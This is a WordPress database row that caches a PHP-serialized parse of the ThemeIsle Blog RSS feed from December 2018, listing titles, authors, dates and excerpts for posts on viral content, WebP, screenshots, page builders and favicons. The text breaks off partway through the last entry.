(216, '_transient_feed_9bc1b9ec726e1f508c5207949084454a', 'a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:52:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\n \n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:8:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"ThemeIsle Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://themeisle.com/blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"WordPress Tutorials and Reviews for Beginners and Advanced\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 28 Dec 2018 15:52:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wordpress.org/?v=4.9.7\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"image\";a:1:{i:0;a:6:{s:4:\"data\";s:11:\"\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:3:\"url\";a:1:{i:0;a:5:{s:4:\"data\";s:120:\"https://mllj2j8xvfl0.i.optimole.com/auto/auto/auto/https/s15165.pcdn.co/wp-content/uploads/2018/03/logo_demo_bar_new.png\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"ThemeIsle Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://themeisle.com/blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"width\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"32\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:6:\"height\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"32\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"How to Create Viral Content on Your WordPress Blog (4 Key Strategies)\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://themeisle.com/blog/create-viral-content/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://themeisle.com/blog/create-viral-content/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 28 Dec 2018 13:09:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Blogging\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:15:\"Marketing & SEO\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://themeisle.com/blog/?p=19405\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:562:\"<p>Having a piece of content go viral is like hitting the jackpot as it can bring a lot of new traffic back to your site. While focusing on quality content should be your number-one priority, you might also want to increase its chances of going big. This means learning how to create viral content on...</p>\n<p>The post <a rel=\"nofollow\" href=\"https://themeisle.com/blog/create-viral-content/\">How to Create Viral Content on Your WordPress Blog (4 Key Strategies)</a> appeared first on <a rel=\"nofollow\" href=\"https://themeisle.com/blog\">ThemeIsle Blog</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"John Hughes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://themeisle.com/blog/create-viral-content/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:133:\"Alex Denning Interview – “A marketing agency that wasn’t very popular with clients would not be a very good marketing agency”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://themeisle.com/blog/alex-denning-interview-on-marketing-and-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"https://themeisle.com/blog/alex-denning-interview-on-marketing-and-wordpress/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 27 Dec 2018 14:59:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:10:\"Interviews\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:19:\"WordPress Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://themeisle.com/blog/?p=20721\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:709:\"<p>Howdy ladies and gents, this marks our last interview of 2018! After having exciting conversations with remarkable people throughout the whole year, we&#8217;re ready to finish things out with a talk with Alex Denning about marketing (and everything it entails). If you want to check out all our interviews from 2018, you can find them...</p>\n<p>The post <a rel=\"nofollow\" href=\"https://themeisle.com/blog/alex-denning-interview-on-marketing-and-wordpress/\">Alex Denning Interview &#8211; &#8220;A marketing agency that wasn&#8217;t very popular with clients would not be a very good marketing agency&#8221;</a> appeared first on <a rel=\"nofollow\" href=\"https://themeisle.com/blog\">ThemeIsle Blog</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Adelina Tuca\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"https://themeisle.com/blog/alex-denning-interview-on-marketing-and-wordpress/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"7 Great News Aggregator Websites You Should Check Out (Plus How to Build Your Own)\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://themeisle.com/blog/news-aggregator-websites-examples/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://themeisle.com/blog/news-aggregator-websites-examples/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 24 Dec 2018 10:25:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:9:\"Resources\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:19:\"WordPress Tutorials\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://themeisle.com/blog/?p=17529\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:619:\"<p>Let&#8217;s agree that the information age can be overwhelming without news aggregator websites. Not only is there a lot of information in total, but it is also scattered all over the web. In order to save time, you can bring all of the news, updates, insights, tips, guides, articles into one location with content aggregators....</p>\n<p>The post <a rel=\"nofollow\" href=\"https://themeisle.com/blog/news-aggregator-websites-examples/\">7 Great News Aggregator Websites You Should Check Out (Plus How to Build Your Own)</a> appeared first on <a rel=\"nofollow\" href=\"https://themeisle.com/blog\">ThemeIsle Blog</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Chris Fitzgerald\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://themeisle.com/blog/news-aggregator-websites-examples/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"What Is WebP? Plus How to Use WebP Images in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"https://themeisle.com/blog/what-is-webp/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://themeisle.com/blog/what-is-webp/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Dec 2018 08:39:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:9:\"Resources\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:9:\"WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://themeisle.com/blog/?p=19722\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:558:\"<p>WebP is a web image format developed by Google that can offer smaller image file sizes at a similar level of quality to existing image formats. In this post, we&#8217;ll dig further into the question of &#8220;what is WebP?&#8221; and share more about the format. What is WebP? Explained in more detail When it comes...</p>\n<p>The post <a rel=\"nofollow\" href=\"https://themeisle.com/blog/what-is-webp/\">What Is WebP? Plus How to Use WebP Images in WordPress</a> appeared first on <a rel=\"nofollow\" href=\"https://themeisle.com/blog\">ThemeIsle Blog</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"John Hughes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://themeisle.com/blog/what-is-webp/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:36:\"\n		\n		\n		\n		\n		\n				\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"How to Take a Screenshot on a Windows and Mac Computer: Step-by-Step\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"https://themeisle.com/blog/how-to-screenshot-on-computer/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://themeisle.com/blog/how-to-screenshot-on-computer/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Dec 2018 09:37:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Resources\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://themeisle.com/blog/?p=20586\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:629:\"<p>If you&#8217;re Googling phrases like “how to screenshot on computer”, you&#8217;re probably stuck in that unfortunate situation where you want to take a screenshot of something on your computer but you don&#8217;t know quite how to do that. Then, we&#8217;ll also share some good third-party screenshot tools and how to upload the screenshots that you...</p>\n<p>The post <a rel=\"nofollow\" href=\"https://themeisle.com/blog/how-to-screenshot-on-computer/\">How to Take a Screenshot on a Windows and Mac Computer: Step-by-Step</a> appeared first on <a rel=\"nofollow\" href=\"https://themeisle.com/blog\">ThemeIsle Blog</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Bill Widmer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"https://themeisle.com/blog/how-to-screenshot-on-computer/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:36:\"\n		\n		\n		\n		\n		\n				\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"Gutenberg Block Editor vs Elementor vs Divi Builder: A Comparison\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"https://themeisle.com/blog/gutenberg-block-editor-vs-elementor-vs-divi-builder/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"https://themeisle.com/blog/gutenberg-block-editor-vs-elementor-vs-divi-builder/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 18 Dec 2018 09:53:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Page Builders\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://themeisle.com/blog/?p=20064\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:616:\"<p>With the release of the new block editor in WordPress 5.0 (aka Gutenberg), you may be questioning whether it will replace plugins that provide similar visual content building functionality. That is, when it comes to the Gutenberg block editor vs Elementor vs Divi Builder, how do the tools compare and which one is right for...</p>\n<p>The post <a rel=\"nofollow\" href=\"https://themeisle.com/blog/gutenberg-block-editor-vs-elementor-vs-divi-builder/\">Gutenberg Block Editor vs Elementor vs Divi Builder: A Comparison</a> appeared first on <a rel=\"nofollow\" href=\"https://themeisle.com/blog\">ThemeIsle Blog</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"John Hughes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"https://themeisle.com/blog/gutenberg-block-editor-vs-elementor-vs-divi-builder/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:36:\"\n		\n		\n		\n		\n		\n				\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WordPress Favicon Guide: How to Create One and Add It to Your Site\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://themeisle.com/blog/wordpress-favicon/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://themeisle.com/blog/wordpress-favicon/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 17 Dec 2018 10:10:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"WordPress 